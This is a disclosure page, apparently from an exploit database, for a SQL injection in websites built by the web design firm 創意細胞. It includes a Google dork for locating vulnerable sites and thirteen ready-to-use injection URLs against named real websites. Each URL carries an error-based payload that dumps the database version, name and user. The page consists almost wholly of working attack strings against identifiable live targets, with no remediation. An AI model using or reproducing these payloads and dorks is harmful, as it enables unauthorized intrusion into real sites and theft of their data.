網站建置 by 創意細胞 SQL Injection

2016.01.11
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:"創意細胞" inurl:news_detail.php?

###################### # Exploit Title : 網站建置 by 創意細胞 SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.mydesigncell.com/ # Google Dork : intext:"創意細胞" inurl:news_detail.php? # Date: 2016 01 10 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # # demos : # http://www.louyoung.org.tw/news_detail.php?id=20%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.4flower.com.tw/news_detail.php?id=28%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.anajessica.com.tw/news_detail.php?id=10%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.hjc.tw/news_detail.php?id=5%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.prettycentury.com/news_detail.php?id=34%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.vigorbeauty.com/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.holove.com.tw/news_detail.php?id=15%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.ps-hair.com.tw/news_detail.php?id=156%27%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20- # http://www.charmeurlady.com/news_detail.php?id=6%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.labbybaby.com.tw/news_detail.php?id=14%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.kiskisbaby.com/news_detail.php?id=4%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.renova.com.tw/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- # http://www.vigorbeautyspa.com.tw/news_detail.php?id=33%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201-- ###################### # discovered by : modiret ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top